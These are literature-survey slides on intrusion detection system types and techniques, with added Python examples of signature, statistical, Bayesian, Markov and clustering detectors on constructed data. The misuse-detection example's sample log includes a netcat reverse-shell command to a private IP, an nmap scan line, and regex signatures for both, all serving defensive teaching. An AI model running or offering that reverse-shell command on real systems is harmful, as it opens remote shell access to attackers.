
LITERATURE SURVEY (cont.)

Intrusion Detection Systems (IDS)

An IDS monitors network and/or system activities for malicious activity or policy violations and produces reports to a management station.

Classification on the basis of detection approach [12]:
- Anomaly detection
- Misuse detection

Project Review, Oct 28, 2011

LITERATURE SURVEY (cont.)

Anomaly detection [13]
- Captures any deviation from the profiles of normal behaviour patterns
- Can detect unknown or novel attacks
- Well-known attacks may not be detected if they do not deviate from the learned profile

Misuse detection
- Based on knowledge of system vulnerabilities and known attack patterns
- Trained to detect intrusions by comparing recent activity to known intrusion scenarios
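The two detection approaches side by side, as an added example that is not part of the original slides: a misuse detector that matches known attack signatures, and an anomaly detector that flags deviations from a per-user profile, both run over the same constructed audit log. The log format, the user names and the two signatures are assumptions chosen for illustration.

```python
"""Added example (not from the original slides): a minimal misuse detector
and a minimal anomaly detector run over the same constructed audit log.
Log format, users and signatures are assumptions for illustration."""
import re

# Constructed audit records: (user, command line). Not real data.
TRAINING_LOG = [
    ("alice", "ls"), ("alice", "vim"), ("alice", "git"), ("alice", "ls"),
    ("bob", "psql"), ("bob", "ls"), ("bob", "vim"), ("bob", "psql"),
]

TEST_LOG = [
    ("alice", "ls"),
    ("alice", "nc -e /bin/sh 10.0.0.5 4444"),   # reverse shell: matches a signature
    ("bob", "nmap -sS 10.0.0.0/24"),            # scan: matches a signature
    ("bob", "tcpdump -i eth0"),                 # never seen for bob: anomaly only
    ("alice", "psql"),                          # normal for bob, never seen for alice
]

# Misuse detection: hypothetical signatures for known attack patterns.
SIGNATURES = {
    "reverse-shell": re.compile(r"\bnc\b.*-e\s*/bin/sh"),
    "port-scan": re.compile(r"\bnmap\b"),
}


def misuse_detect(log):
    """Return (user, command, signature name) for every record that
    matches a known intrusion scenario. Novel attacks produce nothing."""
    hits = []
    for user, cmd in log:
        for name, pattern in SIGNATURES.items():
            if pattern.search(cmd):
                hits.append((user, cmd, name))
    return hits


def build_profile(training_log):
    """Per-user profile of normal behaviour: the set of command names
    observed during an attack-free training period."""
    profile = {}
    for user, cmd in training_log:
        profile.setdefault(user, set()).add(cmd.split()[0])
    return profile


def anomaly_detect(log, profile):
    """Flag any record whose command name lies outside the user's profile.
    This catches the unseen tcpdump but also raises a false alarm on
    alice running psql, which is normal elsewhere but new for her."""
    alerts = []
    for user, cmd in log:
        if cmd.split()[0] not in profile.get(user, set()):
            alerts.append((user, cmd))
    return alerts


if __name__ == "__main__":
    print("misuse:", misuse_detect(TEST_LOG))
    print("anomaly:", anomaly_detect(TEST_LOG, build_profile(TRAINING_LOG)))
```

The contrast the slide describes shows up directly: the misuse detector reports exactly the two signature hits and misses the tcpdump capture, while the anomaly detector reports the capture but also two records that only look unusual relative to the profile.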

LITERATURE SURVEY (cont.)

Classification on the basis of placement of the IDS [14]:
- Host-based intrusion detection: runs on a single host and monitors the activities of that host
- Network-based intrusion detection: placed in the network and monitors the traffic for malicious activity

LITERATURE SURVEY (cont.)

Classification on the basis of functional characterization of detection:
- Statistical based techniques
- Knowledge based techniques
- Machine learning based techniques

Statistical based techniques [16]
- Define normal or expected behaviour by collecting data, then search for unusual behaviour
- Can detect new attacks and vulnerabilities in the system
- Drawback: high false alarm rate
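A statistical detector of the kind just described, as an added example that is not from the slides: it learns the mean and standard deviation of a per-window metric from attack-free data, flags windows whose z-score exceeds a fixed threshold, and measures the false alarm rate on a second clean day, which makes the trade-off behind the "high false alarm" drawback visible. The metric (failed logins per five-minute window) and all counts are constructed.

```python
"""Added example, not from the slides: a z-score based statistical anomaly
detector over constructed 'failed logins per 5-minute window' counts, with
a measurement of the false alarm rate that the slide names as the drawback."""
from statistics import mean, pstdev

# Constructed baseline: counts on a quiet day with no attacks.
BASELINE = [2, 3, 1, 4, 2, 3, 5, 2, 1, 3, 2, 4, 3, 2, 6, 3, 2, 1, 3, 2]

# Constructed second attack-free day, used to estimate false alarms.
CLEAN_DAY = [3, 2, 1, 4, 6, 2, 3, 5, 2, 2]

# Constructed test day with one brute-force burst in window 6.
TEST = [2, 3, 4, 1, 3, 2, 40, 3, 2, 5]


def learn_profile(values):
    """Profile of expected behaviour: (mean, population std dev) of the metric."""
    sigma = pstdev(values)
    return mean(values), max(sigma, 1e-9)  # guard against a constant baseline


def z_score(x, profile):
    mu, sigma = profile
    return (x - mu) / sigma


def detect(values, profile, threshold):
    """Indices of windows whose deviation from the profile exceeds the threshold."""
    return [i for i, x in enumerate(values) if z_score(x, profile) > threshold]


def false_alarm_rate(clean_values, profile, threshold):
    """Fraction of attack-free windows that would still raise an alert.
    Lowering the threshold buys sensitivity at the cost of more false alarms."""
    return len(detect(clean_values, profile, threshold)) / len(clean_values)


if __name__ == "__main__":
    profile = learn_profile(BASELINE)
    for threshold in (2.0, 3.0):
        print(threshold, detect(TEST, profile, threshold),
              false_alarm_rate(CLEAN_DAY, profile, threshold))
```

With this baseline the burst of 40 scores far above either threshold, but at z > 2 one ordinary window of the clean day (six failures) is already reported, which is the behaviour an operator has to tune against.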

LITERATURE SURVEY (cont.)

Knowledge based techniques [15]
- Use knowledge accumulated from various known attacks and system vulnerabilities
- Detect intrusions that were defined previously in the knowledge base
- The IDS is difficult to update as new attacks appear

Machine learning based techniques
- Use a hypothesis model that enables the analysed patterns to be categorized
- Improve the performance of search and data analysis (data reduction and classification)
- Resource-expensive

LITERATURE SURVEY (cont.)

Classification of machine learning based IDS

Bayesian networks [18]
- Encode probabilistic relationships among the variables, often in combination with statistical schemes
- Results are highly dependent on the assumptions made about the system's behaviour; as with threshold-based systems, a deviation in these hypotheses degrades accuracy
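A naive Bayes classifier, the simplest Bayesian network (one class node with conditionally independent feature nodes), as an added example that is not from the slides or from reference [18]. It encodes P(feature | class) tables from constructed labelled connection records and combines them to classify new records; the conditional-independence assumption it rests on is precisely the kind of hypothesis the slide says the results depend on. Feature names, values and labels are constructed.

```python
"""Added example, not from the slides: naive Bayes over constructed
connection records (protocol, service, TCP flag) labelled normal/attack.
Laplace smoothing keeps unseen feature values from zeroing a class."""
import math
from collections import Counter, defaultdict

# Constructed labelled training records: ((protocol, service, flag), label).
TRAINING = [
    (("tcp", "http", "SF"), "normal"), (("tcp", "http", "SF"), "normal"),
    (("udp", "dns", "SF"), "normal"), (("tcp", "smtp", "SF"), "normal"),
    (("tcp", "ssh", "SF"), "normal"), (("tcp", "http", "SF"), "normal"),
    (("tcp", "private", "S0"), "attack"), (("tcp", "private", "REJ"), "attack"),
    (("tcp", "http", "S0"), "attack"), (("icmp", "ecr_i", "SF"), "attack"),
    (("tcp", "private", "S0"), "attack"), (("tcp", "ftp", "REJ"), "attack"),
]


class NaiveBayes:
    def __init__(self, records, alpha=1.0):
        self.alpha = alpha
        self.class_counts = Counter(label for _, label in records)
        self.n_features = len(records[0][0])
        # feature_counts[i][label][value]: records of that class with that value
        self.feature_counts = [defaultdict(Counter) for _ in range(self.n_features)]
        self.values = [set() for _ in range(self.n_features)]
        for feats, label in records:
            for i, v in enumerate(feats):
                self.feature_counts[i][label][v] += 1
                self.values[i].add(v)

    def log_posterior(self, feats, label):
        """log P(label) + sum_i log P(feature_i | label), i.e. the network's
        joint probability under the independence assumption (up to a constant)."""
        lp = math.log(self.class_counts[label] / sum(self.class_counts.values()))
        for i, v in enumerate(feats):
            c = self.feature_counts[i][label]
            lp += math.log((c[v] + self.alpha) /
                           (self.class_counts[label] + self.alpha * len(self.values[i])))
        return lp

    def classify(self, feats):
        return max(self.class_counts, key=lambda label: self.log_posterior(feats, label))


if __name__ == "__main__":
    nb = NaiveBayes(TRAINING)
    for record in [("tcp", "private", "S0"), ("tcp", "http", "SF"), ("udp", "ntp", "SF")]:
        print(record, nb.classify(record))
```

Because each feature is treated as independent given the class, a record whose features are individually benign but jointly suspicious (a combination the model has never related) is scored as if the combination carried no extra information; that is the dependency on assumptions the slide points to.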

LITERATURE SURVEY (cont.)

Markov models [19][20]
- A set of interconnected states; the probabilities associated with the transitions are estimated from training data
- The anomaly score obtained for an observed sequence is compared with a fixed threshold
- Used mainly in the context of host-based IDS
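A first-order Markov model used the way the slide describes, as an added example that is not from the slides or from references [19][20]: transition probabilities between states are estimated from constructed traces of normal activity, an observed sequence receives an anomaly score, and the score is compared with a fixed threshold. The host-IDS setting assumed here is that the states are system-call names; the call names, the traces and the threshold calibration rule are assumptions for illustration.

```python
"""Added example, not from the slides: first-order Markov model over
constructed system-call traces for a host IDS. The anomaly score of a
sequence is the mean negative log-probability of its transitions."""
import math
from collections import defaultdict

# Constructed traces of normal behaviour (system-call names are assumptions).
NORMAL_TRACES = [
    ["open", "read", "read", "close"],
    ["open", "read", "write", "close"],
    ["open", "fstat", "read", "close"],
    ["open", "read", "read", "read", "close"],
]


class MarkovModel:
    def __init__(self, traces, alpha=0.1):
        self.alpha = alpha                      # additive smoothing weight
        self.states = sorted({c for t in traces for c in t})
        self.counts = defaultdict(lambda: defaultdict(int))
        for t in traces:
            for a, b in zip(t, t[1:]):
                self.counts[a][b] += 1

    def prob(self, a, b):
        """P(b | a); smoothing makes unseen transitions rare rather than impossible,
        so a single novel call does not produce an infinite score."""
        total = sum(self.counts[a].values())
        return (self.counts[a][b] + self.alpha) / (total + self.alpha * len(self.states))

    def score(self, seq):
        """Anomaly score: mean -log P over the sequence's transitions (higher = more anomalous)."""
        if len(seq) < 2:
            return 0.0
        return sum(-math.log(self.prob(a, b)) for a, b in zip(seq, seq[1:])) / (len(seq) - 1)

    def calibrate(self, traces, margin=1.5):
        """Fixed threshold: the worst score seen on normal traces, with a safety margin."""
        return margin * max(self.score(t) for t in traces)

    def is_anomalous(self, seq, threshold):
        return self.score(seq) > threshold


if __name__ == "__main__":
    model = MarkovModel(NORMAL_TRACES)
    threshold = model.calibrate(NORMAL_TRACES)
    for seq in (["open", "read", "read", "close"], ["open", "read", "execve", "socket"]):
        print(seq, round(model.score(seq), 3), model.is_anomalous(seq, threshold))
```

A sequence that follows the trained transitions scores well below the threshold, while one that jumps from read to a call the model never saw is dominated by the smoothed low probability of that transition and crosses it.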

LITERATURE SURVEY (cont.)

Neural networks [32]
- Employed in anomaly intrusion detection to create user profiles
- Flexible and adaptable to environmental changes

Genetic algorithms [25][27]
- Global search heuristics used to derive classification rules and to select appropriate features or optimal parameters
- Flexible and robust global search method
- High resource consumption

LITERATURE SURVEY (cont.)

Clustering and outlier detection
- Groups the observed raw audit data into clusters; each new data point is classified by the cluster it falls into
- Some points may not belong to any cluster; these outliers are the candidate intrusions
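Clustering followed by outlier detection, as an added example that is not from the slides: k-means (Lloyd's algorithm) groups constructed connection records by two features, and a new record whose distance to its nearest cluster centre exceeds a threshold derived from the training clusters is treated as belonging to no cluster. The features (packets per second, mean bytes per packet), the records and the threshold rule are assumptions for illustration.

```python
"""Added example, not from the slides: k-means clustering of constructed
connection records plus distance-based outlier detection for points that
belong to no cluster."""
import math

# Constructed training records (packets/s, mean bytes per packet): two normal
# behaviours, interactive sessions and bulk transfers. Not real data.
TRAINING = [
    (2.0, 80.0), (3.0, 90.0), (2.5, 70.0), (1.5, 85.0), (3.5, 75.0),
    (40.0, 1400.0), (45.0, 1380.0), (38.0, 1420.0), (42.0, 1390.0), (41.0, 1410.0),
]


def dist(a, b):
    return math.sqrt(sum((x - y) ** 2 for x, y in zip(a, b)))


def kmeans(points, k, iters=50):
    """Lloyd's algorithm with deterministic initial centroids (the first k points)."""
    centroids = [points[i] for i in range(k)]
    for _ in range(iters):
        groups = [[] for _ in range(k)]
        for p in points:
            groups[min(range(k), key=lambda i: dist(p, centroids[i]))].append(p)
        new = [tuple(sum(c) / len(g) for c in zip(*g)) if g else centroids[i]
               for i, g in enumerate(groups)]
        if new == centroids:        # assignments stopped changing
            break
        centroids = new
    return centroids


def nearest(p, centroids):
    i = min(range(len(centroids)), key=lambda j: dist(p, centroids[j]))
    return i, dist(p, centroids[i])


def outlier_threshold(points, centroids, factor=3.0):
    """Largest distance of any training point to its own centroid, scaled by a factor."""
    return factor * max(nearest(p, centroids)[1] for p in points)


def classify(p, centroids, threshold):
    """Cluster index for a new record, or None when it belongs to no cluster."""
    i, d = nearest(p, centroids)
    return None if d > threshold else i


if __name__ == "__main__":
    centroids = kmeans(TRAINING, 2)
    threshold = outlier_threshold(TRAINING, centroids)
    for record in [(2.8, 82.0), (43.0, 1395.0), (500.0, 60.0)]:
        print(record, classify(record, centroids, threshold))
```

The record with very many tiny packets lands far from both centres and is reported as an outlier. In practice the features would be scaled first, since here the byte dimension dominates the Euclidean distance.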

COMPARISON

Technique              | Pros                                                | Cons
-----------------------+-----------------------------------------------------+---------------------------------------------------------------------------
Behavioural based      | Prior knowledge about normal activity not required. | Susceptible to being trained by attackers.
                       | Accurate notification of malicious activities.      | Difficult setting of parameters and metrics.
                       |                                                     | Unrealistic quasi-stationary process assumption.
Knowledge based        | Robustness.                                         | Difficult and time-consuming availability of high-quality knowledge/data.
                       | Scalability and flexibility.                        |
Machine learning based | Flexibility and adaptability.                       | High dependency on the assumption about the behaviour accepted for the system.
                       | Capture of interdependencies.                       | High resource consumption.